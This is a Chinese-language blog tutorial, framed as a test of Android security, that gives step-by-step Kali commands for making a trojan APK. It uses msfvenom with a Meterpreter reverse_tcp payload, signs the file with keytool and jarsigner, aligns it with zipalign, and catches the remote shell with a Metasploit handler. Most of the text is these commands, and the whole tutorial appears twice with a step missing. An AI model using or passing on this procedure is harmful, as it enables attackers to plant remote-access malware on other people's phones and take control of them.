眾所周知,手機作業系統的兩大巨頭:安卓和蘋果。而安卓由於是開源系統,流暢性和安全性成為使用者口中經常吐槽的話題,流暢性從使用中我們可以得到驗證。那麼為什麼說安全性也比蘋果系統略勝一籌呢,怎麼才能看得出呢?現在小編就帶大家去驗證一下安卓手機的安全性問題。
1、開啟kali,輸入命令【msfvenom -p android/meterpreter/reverse_tcp LHOST= “kali系統的IP”LPORT= “埠可自由設定,但不要設為已經固定的埠號” R > aaa.apk】。由安卓手機的安卓包都是以apk結尾的,所以要生成apk結尾的檔案。
如果出現下圖的資訊,就表示木馬檔案已經生成,可以從根目錄下找到aaa.apk檔案。
2、透過【keytool -genkey -v -keystore apk-trojan-key.keystore -alias aaa -keyalg RSA -keysize 1024 -validity 999】命令,建立一個證書。
然後進行相關資訊的配置,確認證書資訊。
3、【jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore aaa.apk aaa】,建立數字簽名。
4、先安裝zipalign工具,安裝的命令是【apt-get install zipalign】。
接著就可以對木馬檔案進行優化了,命令是【zipalign -v 4 aaa.apk aaaa.apk】,如果出現報錯資訊可以忽略。
6、使用【use exploit/multi/handler】載入攻擊模組,【set payload android/meterpreter/reverse_tcp】選擇使用的payload模組
然後在安卓虛擬機器安裝木馬檔案,並執行。
7、返回kali系統,執行攻擊命令【exploit】,就會發現返回木馬已經被執行了,證明已經獲取了安卓虛擬機器許可權,此時命令列會自動進入meterperter命令,輸了【help】命令可以檢視安卓系統的操作指令。至此就完成了入侵安卓系統的基本操作了!
說不安全,那是要看跟誰做比較,對吧!也是相對而言,並不是絕對的! 相對蘋果封閉的系統,肯定會說不安全,但也只是相對而言。
所以,不必糾結這個問題,你覺得好用就行了!
眾所周知,手機作業系統的兩大巨頭:安卓和蘋果。而安卓由於是開源系統,流暢性和安全性成為使用者口中經常吐槽的話題,流暢性從使用中我們可以得到驗證。那麼為什麼說安全性也比蘋果系統略勝一籌呢,怎麼才能看得出呢?現在小編就帶大家去驗證一下安卓手機的安全性問題。
老規矩,還是利用kali系統下整合的metasploit工具生成一個木馬1、開啟kali,輸入命令【msfvenom -p android/meterpreter/reverse_tcp LHOST= “kali系統的IP”LPORT= “埠可自由設定,但不要設為已經固定的埠號” R > aaa.apk】。由安卓手機的安卓包都是以apk結尾的,所以要生成apk結尾的檔案。
如果出現下圖的資訊,就表示木馬檔案已經生成,可以從根目錄下找到aaa.apk檔案。
2、透過【keytool -genkey -v -keystore apk-trojan-key.keystore -alias aaa -keyalg RSA -keysize 1024 -validity 999】命令,建立一個證書。
然後進行相關資訊的配置,確認證書資訊。
3、【jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore aaa.apk aaa】,建立數字簽名。
為了保證木馬能夠在大多數安卓手機安裝執行,需要對木馬檔案進行最佳化4、先安裝zipalign工具,安裝的命令是【apt-get install zipalign】。
接著就可以對木馬檔案進行優化了,命令是【zipalign -v 4 aaa.apk aaaa.apk】,如果出現報錯資訊可以忽略。
6、使用【use exploit/multi/handler】載入攻擊模組,【set payload android/meterpreter/reverse_tcp】選擇使用的payload模組
然後在安卓虛擬機器安裝木馬檔案,並執行。
7、返回kali系統,執行攻擊命令【exploit】,就會發現返回木馬已經被執行了,證明已經獲取了安卓虛擬機器許可權,此時命令列會自動進入meterperter命令,輸了【help】命令可以檢視安卓系統的操作指令。至此就完成了入侵安卓系統的基本操作了!